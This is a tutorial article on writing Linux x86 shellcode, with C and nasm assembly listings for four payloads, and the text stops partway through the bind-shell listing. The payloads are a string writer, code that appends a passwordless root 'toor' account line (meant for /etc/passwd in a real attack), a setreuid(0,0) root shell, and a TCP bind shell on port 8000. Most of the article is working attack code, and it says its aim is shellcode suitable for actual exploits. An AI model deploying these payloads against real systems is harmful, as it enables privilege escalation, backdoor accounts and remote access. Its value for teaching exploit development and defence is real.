Linux shellcode optimisation


Michał Piotrowski

A shellcode is an essential part of any exploit. During an attack, it is injected into the target application and performs the desired actions within it. However, the basic rules for building shellcodes are not widely known, even though applying them doesn't require advanced skills.

A shellcode (sometimes also called bytecode) is a sequence of machine-code instructions that forms a vital element of buffer overflow exploits. During an attack, the exploit injects its shellcode into a running application, causing the target program to execute the intruder's commands. The name shellcode originates from the earliest codes of this type, whose purpose was to bring up the system shell (in Unix-based systems, the shell is the /bin/sh program). The term now covers code performing a huge variety of actions.

Any shellcode has to fulfil a number of requirements. The first is that it cannot contain null bytes (0x00), since these signify the end of a character string and stop processing in many functions commonly exploited in buffer overflows, such as strcpy(), strcat() and sprintf(). (gets() is different: it stops reading at a newline, so a shellcode delivered through it must avoid 0x0a rather than null bytes.) A shellcode must also be autonomous and position-independent, that is, it must work wherever in memory it ends up, so static addressing cannot be used. Other features which can occasionally be significant are the size of the shellcode and the character set it uses (for example, printable ASCII only).
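Checking a candidate shellcode for forbidden bytes is easy to automate. The following is a minimal sketch, assuming the assembled bytes are already available in a buffer; find_bad_byte() is a hypothetical helper of our own, not part of any tool mentioned in this article. The reject_newline switch covers targets such as gets(), where 0x0a is the problem byte.

```c
#include <stddef.h>

/* Hypothetical helper: returns the offset of the first byte that would
 * truncate the shellcode (0x00, and optionally 0x0a for gets()-style
 * input), or -1 if the buffer is clean. */
long find_bad_byte(const unsigned char *buf, size_t len, int reject_newline)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;           /* ends a C string */
        if (reject_newline && buf[i] == 0x0a)
            return (long)i;           /* ends a line read by gets() */
    }
    return -1;
}
```

For example, nasm encodes `mov eax, 4` in 32-bit code as B8 04 00 00 00, which find_bad_byte() rejects at offset 2, while `xor eax, eax` followed by `mov al, 4` (31 C0 B0 04) passes.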

Let's have a look at writing shellcodes in practice. We will create four programs with different functionality and then modify them to make them more compact and suitable for use in actual exploits. Note that we will be looking exclusively at shellcodes, not at buffer overflow attacks or at writing exploits.

To create a working shellcode, we need a thorough understanding of assembly language for the shellcode's target processor (see the inset Registers and instructions). We'll be working on 32-bit x86 processors running Linux with the 2.4 kernel (all examples also work with the 2.6 kernel series), so we have a choice of two main assembler syntax conventions: AT&T and Intel. Although AT&T syntax is the default in the GNU tools (including gcc and gdb), we will use Intel syntax for its greater clarity. All examples are assembled with the Netwide Assembler (nasm) version 0.98.35, available in most popular Linux distributions. We will also use the ndisasm and hexdump utilities.
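Once nasm has produced the raw opcodes, they are usually embedded in an exploit as a C string literal of \xNN escapes. As a small illustration of that step, here is a sketch of a hypothetical helper, bytes_to_c_escape(), that turns a byte buffer (for example, what hexdump shows for nasm's output) into that form; the name and interface are our own and are not part of nasm, ndisasm or hexdump.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: writes each byte of buf as a four-character
 * "\xNN" escape into out, which must hold 4 * len + 1 characters.
 * Returns the number of characters written (excluding the final '\0'). */
size_t bytes_to_c_escape(const unsigned char *buf, size_t len, char *out)
{
    size_t pos = 0;

    out[0] = '\0';                 /* valid result even when len == 0 */
    for (size_t i = 0; i < len; i++)
        pos += (size_t)sprintf(out + pos, "\\x%02x", (unsigned)buf[i]);
    return pos;
}
```

Feeding it the bytes B8 04 00 00 00 yields the text \xb8\x04\x00\x00\x00, which can be pasted between double quotes in a C test harness.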

Registers and instructions

Registers (see Table 1) are small memory cells within the CPU, used for storing the numerical values required by the processor during program execution. In 32-bit x86 CPUs, the size of the registers is 32 bits (4 bytes). Registers can be divided according to their purpose into data registers (EAX, EBX, ECX, EDX) and address registers (ESI, EDI, ESP, EBP, EIP).

Data registers are divided up into smaller sections of 16 bits (AX, BX, CX, DX) and 8 bits (AH, AL, BH, BL, CH, CL, DH, DL). The smaller registers can be used to decrease code size and get rid of padding null bytes (see Figure 1). Most of the address registers have their own specific uses and should not be used for storing ordinary data.

Figure 1. Structure of the EAX register
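The aliasing shown in Figure 1 can be modelled in C with shifts and masks. This is a sketch for illustration only; the helper names are our own. It also shows why writing only AL after clearing EAX leaves exactly the small value in the full register, without ever encoding the padding null bytes.

```c
#include <stdint.h>

/* Views of a 32-bit register value through its smaller names. */
uint16_t low16(uint32_t reg) { return (uint16_t)(reg & 0xffffu); }      /* AX: bits 0-15 */
uint8_t  high8(uint32_t reg) { return (uint8_t)((reg >> 8) & 0xffu); }  /* AH: bits 8-15 */
uint8_t  low8(uint32_t reg)  { return (uint8_t)(reg & 0xffu); }         /* AL: bits 0-7  */

/* Writing AL (e.g. "mov al, 4") replaces bits 0-7 only; bits 8-31 survive. */
uint32_t set_low8(uint32_t reg, uint8_t value)
{
    return (reg & 0xffffff00u) | value;
}
```

With EAX = 0x12345678, AX is 0x5678, AH is 0x56 and AL is 0x78; with EAX = 0, setting AL to 4 makes EAX equal to 4.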

 

Table 1. Registers in an x86 processor and their purposes

  • EAX, AX, AH, AL (accumulator): arithmetic operations, I/O operations and specifying the required system call. Also holds the value returned by a system call.

  • EBX, BX, BH, BL (base register): indirect memory addressing. Also holds the first argument of a system call.

  • ECX, CX, CH, CL (counter): typically used as a loop counter. Also holds the second argument of a system call.

  • EDX, DX, DH, DL (data register): used together with EAX in multiplication and division, and to hold I/O port numbers. Also holds the third argument of a system call.

  • ESI (source index), EDI (destination index): typically used for manipulating long data sequences, including strings and arrays.

  • ESP (stack pointer): holds the address of the top of the stack.

  • EBP (base pointer, frame pointer): holds the base address of the current stack frame; used to refer to local variables stored in that frame.

  • EIP (instruction pointer): holds the address of the next instruction to be executed.

Assembly language instructions are symbolic names (mnemonics) for processor commands. There are a great many of them, and the most important ones can be divided into:

  • move instructions (mov, push, pop),

  • arithmetical instructions (add, sub, inc, neg, mul, div),

  • logical instructions (and, or, xor, not),

  • control flow instructions (jmp, call, int, ret),

  • instructions for manipulating bits, bytes and character strings (shl, shr, rol, ror),

  • input/output instructions (in, out),

  • flag control instructions.

We won't go into all the available instructions, but rather we'll concentrate on just the ones we need. Table 2 presents a brief summary of the required instructions.

Table 2. Summary of the most useful assembler instructions

  • mov (move): copies the source operand (a register, memory location or immediate value) into the destination: mov <destination>, <source>.

  • push (put value on the stack): decrements ESP by the operand size (4 bytes for a 32-bit operand) and stores the operand at the new top of the stack: push <source>.

  • pop (get value from the stack): copies the value at the top of the stack into the operand and increments ESP accordingly: pop <destination>.

  • add (arithmetic addition): adds the source to the destination and stores the result in the destination: add <destination>, <source>.

  • sub (arithmetic subtraction): subtracts the source from the destination and stores the result in the destination: sub <destination>, <source>.

  • xor (exclusive OR): computes the bitwise exclusive OR of the two operands and stores it in the destination: xor <destination>, <source>.

  • jmp (jump): writes the specified address to the EIP register, so execution continues there: jmp <address>.

  • call (call): works like jmp, but before writing to the EIP register it pushes the address of the next instruction onto the stack: call <address>.

  • lea (load effective address): computes the address of the source memory operand and writes it to the destination register: lea <destination>, <source>.

  • int (interrupt): raises a software interrupt with the specified number; on Linux, int 0x80 passes control to the kernel's system call handler: int <number>.
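The interplay of push, pop, jmp and call in Table 2 can be hard to picture. The sketch below is a toy model of our own (not a CPU emulator): memory is an array of 32-bit slots, ESP is a slot index rather than a byte address, and the stack grows towards lower indices, as it does on x86. The sim_ret() helper models ret, which pops the saved address back into EIP.

```c
#include <stdint.h>

/* Toy machine state: only what the stack instructions touch. */
struct toy_cpu {
    uint32_t mem[32];
    uint32_t esp;   /* index of the current top-of-stack slot */
    uint32_t eip;   /* address of the next instruction */
};

void sim_push(struct toy_cpu *c, uint32_t v) { c->mem[--c->esp] = v; }  /* ESP down, then store */
uint32_t sim_pop(struct toy_cpu *c) { return c->mem[c->esp++]; }       /* load, then ESP up */

/* jmp: just overwrite EIP */
void sim_jmp(struct toy_cpu *c, uint32_t target) { c->eip = target; }

/* call: push the address of the following instruction, then jump */
void sim_call(struct toy_cpu *c, uint32_t next_insn, uint32_t target)
{
    sim_push(c, next_insn);
    sim_jmp(c, target);
}

/* ret: pop the saved return address back into EIP */
void sim_ret(struct toy_cpu *c) { c->eip = sim_pop(c); }
```

After sim_call(&c, 0x1005, 0x2000), EIP is 0x2000 and the top of the stack holds 0x1005; a following sim_ret() resumes at 0x1005 with ESP back where it started.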

 

Building the shellcode

Our aim is to write four shellcodes, performing four different operations: writing a string to the standard output, appending data to a file, starting the system shell and binding the shell to a TCP port. We will start by writing the programs in C, as it's much easier to translate a working program into assembler than to write it in assembler from scratch.

The first program is simply called write - Listing 1 presents its source code. Its sole purpose is to write the message stored in the line variable to the standard output.

Listing 1. The write.c file

 
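#include <stdlib.h>   /* exit() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* write() */

int main(void)
{
    char *line = "hello, world!\n";
    write(1, line, strlen(line));   /* descriptor 1 = standard output */
    exit(0);
}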

 

Listing 2 shows another program, this time called add. It opens a file called /file for writing in append mode (the file may be empty, but it has to exist) and appends the line toor:x:0:0::/:/bin/bash to it. In a real attack this entry would be appended to the /etc/passwd file, but for the time being it is safer not to modify the password file.

Listing 2. The add.c file

 
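#include <fcntl.h>    /* open(), O_WRONLY, O_APPEND */
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* write(), close() */

int main(void)
{
    char *name = "/file";
    char *line = "toor:x:0:0::/:/bin/bash\n";
    int fd;
    fd = open(name, O_WRONLY|O_APPEND);   /* /file must already exist */
    write(fd, line, strlen(line));
    close(fd);
    exit(0);
}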

 

The third program, called shell, is a classic shellcode. Its task is to run /bin/sh after calling setreuid(0, 0) to restore root privileges to the running process (this is necessary when attacking a suid program that drops its root privileges for security reasons). Listing 3 shows the source of the shell program.

Listing 3. The shell.c file

 
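#include <unistd.h>   /* setreuid(), execve() */

int main(void)
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;                /* argv must be NULL-terminated */
    setreuid(0, 0);                /* real and effective UID := root */
    execve(name[0], name, NULL);
    return 1;                      /* reached only if execve() fails */
}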

 

Our final and most advanced program is called bind (see Listing 4). When executed, the program listens on TCP port 8000 and, upon receiving an incoming connection, redirects its standard input, output and error to that connection and starts a shell. This imitates the mode of operation of typical exploits used against network servers.

Listing 4. The bind.c file

 
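#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* htons() */

int main(void)
{
    char *name[2];
    int fd1, fd2;
    struct sockaddr_in serv;
    name[0] = "/bin/sh";
    name[1] = NULL;
    serv.sin_addr.s_addr = 0;          /* INADDR_ANY: all interfaces */
    serv.sin_port = htons(8000);       /* port in network byte order */
    serv.sin_family = AF_INET;
    fd1 = socket(AF_INET, SOCK_STREAM, 0);
    bind(fd1, (struct sockaddr *)&serv, 16);  /* 16 == sizeof(struct sockaddr_in) */
    listen(fd1, 1);
    fd2 = accept(fd1, 0, 0);
    dup2(fd2, 0);                      /* stdin  <- connection */
    dup2(fd2, 1);                      /* stdout -> connection */
    dup2(fd2, 2);                      /* stderr -> connection */
    execve(name[0], name, NULL);
    return 1;                          /* reached only if execve() fails */
}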

 

Figure 2 illustrates the compilation process and the effect of running the programs.

 

Figure 2. Compilation and execution of the write, add, shell and bind programs
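bind.c hard-codes 16 as the address length and converts the port with htons(). The sketch below uses a hypothetical helper of our own, make_bind_addr(), to build the same 0.0.0.0:8000 address so that both details can be checked: on Linux, sizeof(struct sockaddr_in) is 16, and port 8000 (0x1f40) is stored as the bytes 0x1f 0x40 in network byte order. Unlike Listing 4, it also zeroes the sin_zero padding with memset().

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

/* Hypothetical helper: the address bind.c passes to bind(). */
struct sockaddr_in make_bind_addr(unsigned short port)
{
    struct sockaddr_in serv;

    memset(&serv, 0, sizeof serv);              /* clears sin_zero as well */
    serv.sin_family = AF_INET;
    serv.sin_port = htons(port);                /* big-endian on the wire */
    serv.sin_addr.s_addr = htonl(INADDR_ANY);   /* 0.0.0.0 */
    return serv;
}
```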

 

On to assembler

Now that we know our applications are working as they should, we can go on to rewriting them in assembler. Our general aim is to execute the same system functions as in the C programs, but to do this we need to know the system call numbers assigned to them. On 32-bit x86 this information can be obtained from the /usr/include/asm/unistd.h file: write() is number 4, exit() is 1, open() is 5, close() is 6, setreuid() is 70, execve() is 11 and dup2() is 63. Socket functions are a slightly different story: socket(), bind(), listen() and accept() are all served by a single system call, socketcall (number 102), whose first argument selects the requested operation.
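The numbers above are specific to 32-bit x86 Linux (on x86-64, for example, write() is number 1). A minimal sketch, keeping them in a lookup table with a hypothetical helper of our own, i386_syscall_number(), that returns the value to load into EAX before int 0x80:

```c
#include <string.h>

/* i386 Linux system call numbers quoted in the text. */
struct syscall_entry { const char *name; int number; };

static const struct syscall_entry i386_syscalls[] = {
    { "exit", 1 },    { "write", 4 },   { "open", 5 },
    { "close", 6 },   { "execve", 11 }, { "dup2", 63 },
    { "setreuid", 70 }, { "socketcall", 102 },
};

/* Hypothetical helper: EAX value for the named call, or -1 if unknown. */
int i386_syscall_number(const char *name)
{
    size_t n = sizeof i386_syscalls / sizeof i386_syscalls[0];

    for (size_t i = 0; i < n; i++)
        if (strcmp(i386_syscalls[i].name, name) == 0)
            return i386_syscalls[i].number;
    return -1;
}
```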

We also need to provide the functions with the necessary arguments. The first program only uses write() and exit(), so the matter is simple. The write() function takes three arguments: the target file descriptor, a pointer to the source data buffer and the number of characters to be written. The exit() function only takes one argument, the exit status.

Write

Listing 5 presents the source code of the assembler equivalent of the write program. Lines 1 and 4 declare the data section (.data) and the code section (.text). Line 6 defines the _start label, the default ELF entry point expected by the ld linker; line 5 declares it global so that ld can find it. Line 2 defines the msg variable, a string of bytes (the db directive) terminated with a line feed character (0x0a). Lines 8 and 15 are comments and are ignored by the assembler. Lines 9-13 and 16-18 contain the instructions that prepare and execute the write() and exit() calls. Let's take a closer look at them.

Listing 5. The write1.asm file

 
1: section .data
2: msg db 'hello, world!', 0x0a
3:
4: section .text
5: global _start
6: _start:
7:
8: ; write(1, msg, 14)
9: mov eax, 4
10: mov ebx, 1
11: mov ecx, msg
12: mov edx, 14
13: int 0x80
14:
15: ; exit(0)
16: mov eax, 1
17: mov ebx, 0
18: int 0x80

 

To start with, we write the number of the system call to be executed into the EAX register (write is number 4) and put the function arguments into the appropriate registers: EBX should contain the standard output descriptor (number 1), ECX is filled with the starting address of the string to be written (stored in the msg variable), and EDX holds the string length (14 characters including the line feed). We then execute the instruction int 0x80, which switches to kernel mode and executes the relevant system call. The same mechanism applies to the exit() function: we put its number (1) in the EAX register, write 0 to EBX and enter kernel mode once again. Figure 3 presents the compilation and execution of our first program rewritten in assembler.
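The register setup described above follows a fixed pattern: call number in EAX, arguments in EBX, ECX and EDX. The sketch below models that pattern in C. The struct and both helpers are hypothetical names of our own, and 0x08049000 in the usage is only an illustrative address standing in for msg.

```c
#include <stdint.h>

/* Registers the kernel reads at "int 0x80" for calls with up to three
 * arguments: EAX = call number, EBX/ECX/EDX = arguments 1-3. */
struct int80_regs { uint32_t eax, ebx, ecx, edx; };

/* Lines 9-12 of Listing 5: write(fd, buf, len) */
struct int80_regs prepare_write(uint32_t fd, uint32_t buf_addr, uint32_t len)
{
    struct int80_regs r = { .eax = 4, .ebx = fd, .ecx = buf_addr, .edx = len };
    return r;
}

/* Lines 16-17 of Listing 5: exit(status); ECX and EDX are unused */
struct int80_regs prepare_exit(uint32_t status)
{
    struct int80_regs r = { .eax = 1, .ebx = status };
    return r;
}
```

The length 14 matches the C string "hello, world!\n", whose sizeof is 15 including the terminating null.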

 

Figure 3. Effect of executing the write1 program

 

Add

Listing 6 shows the code of the assembler rewrite of our second program, add. As you can see, it is slightly more complicated than the previous example.

Listing 6. The add1.asm file

 
1: section .data
2: name db '/file', 0
3: line db 'toor:x:0:0::/:/bin/bash', 0x0a
4:
5: section .text
6: global _start
7: _start:
8:
9: ; open(name, O_WRONLY|O_APPEND)
10: mov eax, 5
11: mov ebx, name
12: mov ecx, 1025
13: int 0x80
14:
15: mov ebx, eax
16:
17: ; write(fd, line, 24)
18: mov eax, 4
19: mov ecx, line
20: mov edx, 24
21: int 0x80
22:
23: ; close(fd)
24: mov eax, 6
25: int 0x80
26:
27: ; exit(0)
28: mov eax, 1
29: mov ebx, 0
30: int 0x80

 

We start by declaring two string variables in the data section, name and line. They contain, respectively, the name of the file to be modified and the line we want to append. Opening /file requires us to put the number of the open() system call (5) in the EAX register and specify the function's two parameters:

  • the address of the name variable, stored in the EBX register;

  • the value 1025 (the numeric representation of the combined O_WRONLY and O_APPEND flags), stored in the ECX register.
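Both magic numbers in Listing 6 can be derived from the C headers instead of being computed by hand. A minimal sketch, assuming x86 Linux, where O_WRONLY is 01 and O_APPEND is 02000 (octal); the helper names are our own:

```c
#include <fcntl.h>
#include <string.h>

/* open() flags used by add1.asm: 1 | 1024 on x86 Linux */
int add_open_flags(void) { return O_WRONLY | O_APPEND; }

/* write() length: the passwd line plus its trailing newline */
size_t add_line_length(void) { return strlen("toor:x:0:0::/:/bin/bash\n"); }
```

These yield 1025 and 24, the values loaded into ECX in line 12 and into EDX in line 20.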

After it is executed, the open() function returns its result (the descriptor of the opened file) in the EAX register. We'll need the descriptor to call write() and close(), so in line 15 we copy it into the EBX register. Thus the next function to be called (write()) has its first argument (the descriptor) in the right place. Now we put 4 in EAX, the address of the line variable in ECX and 24 (the length of the appended line) in EDX, and transfer execution to the system kernel (line 21).

We then need to close /file by calling close() (the EAX register should contain 6, while EBX still holds the descriptor number for the opened file) and we can end the program by calling exit() (with 1 in EAX and 0 in EBX). Figure 4 presents the compilation and execution of the program.

 

Figure 4. Effect of executing the add1.asm program
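The descriptor trick in add1.asm relies on the kernel returning results in EAX while leaving EBX untouched. The toy trace below (our own model, not a CPU emulator) records EAX and EBX at each int 0x80 that follows open(); fd stands for whatever descriptor open() happened to return.

```c
#include <stdint.h>

struct step { uint32_t eax, ebx; };   /* registers seen at one int 0x80 */

/* Hypothetical helper: trace of lines 15-30 of Listing 6. */
void trace_add1(uint32_t fd, struct step out[3])
{
    uint32_t eax = fd;     /* open() leaves the descriptor in EAX */
    uint32_t ebx = eax;    /* line 15: mov ebx, eax */

    eax = 4;                                /* line 18 */
    out[0] = (struct step){ eax, ebx };     /* write(fd, line, 24) */

    /* write() returns its result in EAX, so line 24 must reload EAX,
       but EBX is preserved across int 0x80 and still holds fd. */
    eax = 6;                                /* line 24 */
    out[1] = (struct step){ eax, ebx };     /* close(fd) */

    eax = 1;                                /* line 28 */
    ebx = 0;                                /* line 29 */
    out[2] = (struct step){ eax, ebx };     /* exit(0) */
}
```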

 

Shell

The shell program is rewritten in a similar way; Listing 7 shows the resulting source code. We won't go into it in detail, but we'll take a closer look at the seemingly complex execve() call (lines 15-21).


Listing 7. The shell1.asm file

 
1: section .data
2: name db '/bin/sh', 0
3:
4: section .text
5: global _start
6: _start:
7:
8: ; setreuid(0, 0)
9: mov eax, 70
10: mov ebx, 0
11: mov ecx, 0
12: int 0x80
13:
14: ; execve("/bin/sh", ["/bin/sh", NULL], NULL)
15: mov eax, 11
16: mov ebx, name
17: push 0
18: push name
19: mov ecx, esp
20: mov edx, 0
21: int 0x80

 

The first argument of the execve() function is the address of the string (line 16) specifying the path to the program to be executed (/bin/sh). The second argument is an array of pointers that must contain at least two elements: the address of the path string and a terminating NULL. The easiest way to build this array is on the stack. Because the stack grows towards lower addresses, we first push the second array element (NULL, line 17) and then the first one (the address of the name string, line 18). Then we set the second function argument (line 19) from the ESP register, which holds the address of the top of the stack and therefore the starting address of our array. The third and final argument is handled simply by loading 0 into the EDX register (line 20). The complete program is assembled and run just like our other programs.
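The push order is easier to see on a model. The sketch below uses a toy downward-growing stack of 32-bit slots (our own model, with ESP as a slot index) to replay lines 17-19 of Listing 7. build_argv() is a hypothetical helper, and 0x08049000 in the usage is only an illustrative address for name.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy stack: slot[esp] is the top; pushes move esp towards 0. */
struct toy_stack { uint32_t slot[16]; size_t esp; };

void toy_push(struct toy_stack *s, uint32_t v) { s->slot[--s->esp] = v; }

/* Replays lines 17-19 and returns the value that ends up in ECX:
 * slot[ecx] and slot[ecx + 1] then form argv = { name, NULL }. */
size_t build_argv(struct toy_stack *s, uint32_t name_addr)
{
    toy_push(s, 0);           /* line 17: push 0    -> argv[1] = NULL */
    toy_push(s, name_addr);   /* line 18: push name -> argv[0] = name */
    return s->esp;            /* line 19: mov ecx, esp */
}
```

Starting from an empty stack (esp = 16), build_argv() returns 14, with the name address in slot 14 and NULL in slot 15, which is exactly a NULL-terminated argv array read upwards from ECX.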

Bind

The last of our shellcodes is the most complicated and requires a more detailed explanation due to the specific way of calling socket functions. Listing 8 presents the assembler version of the bind program.
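In outline, socketcall takes 102 in EAX, the number of the requested operation in EBX (1 for socket(), 2 for bind(), 4 for listen() and 5 for accept(), matching SYS_SOCKET, SYS_BIND, SYS_LISTEN and SYS_ACCEPT in the kernel header linux/net.h) and, in ECX, the address of an array holding that operation's arguments. The sketch below replays lines 9-15 of Listing 8 on a toy downward-growing stack; the SC_* names, the struct and prepare_socket() are hypothetical names of our own.

```c
#include <stdint.h>
#include <sys/socket.h>

/* socketcall operation numbers (our own names, kernel values). */
enum { SC_SOCKET = 1, SC_BIND = 2, SC_LISTEN = 4, SC_ACCEPT = 5 };

/* What the kernel sees at int 0x80 for a socketcall. */
struct socketcall_regs { uint32_t eax, ebx; const uint32_t *ecx; };

/* Pushes socket()'s arguments last-to-first, so that *esp ends up
 * pointing at { AF_INET, SOCK_STREAM, 0 }, then fills the registers. */
struct socketcall_regs prepare_socket(uint32_t **esp)
{
    uint32_t *top = *esp;

    *--top = 0;              /* line 9:  push 0 (protocol) */
    *--top = SOCK_STREAM;    /* line 10: push 1 */
    *--top = AF_INET;        /* line 11: push 2 */
    *esp = top;

    struct socketcall_regs r = { 102, SC_SOCKET, top };  /* lines 13-15 */
    return r;
}
```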

Listing 8. The bind1.asm file

 
1: section .data
2: name db '/bin/sh', 0
3:
4: section .text
5: global _start
6: _start:
7:
8: ; socket(AF_INET, SOCK_STREAM, 0)
9: push 0
10: push 1
11: push 2
12:
13: mov eax, 102
14: mov ebx, 1
15: mov ecx, esp
16: int 0x80
17:
18: mov edx, eax
19:
20: ; bind(fd1, {AF_INET, 8000, "0.0.0.0"}, 16)
21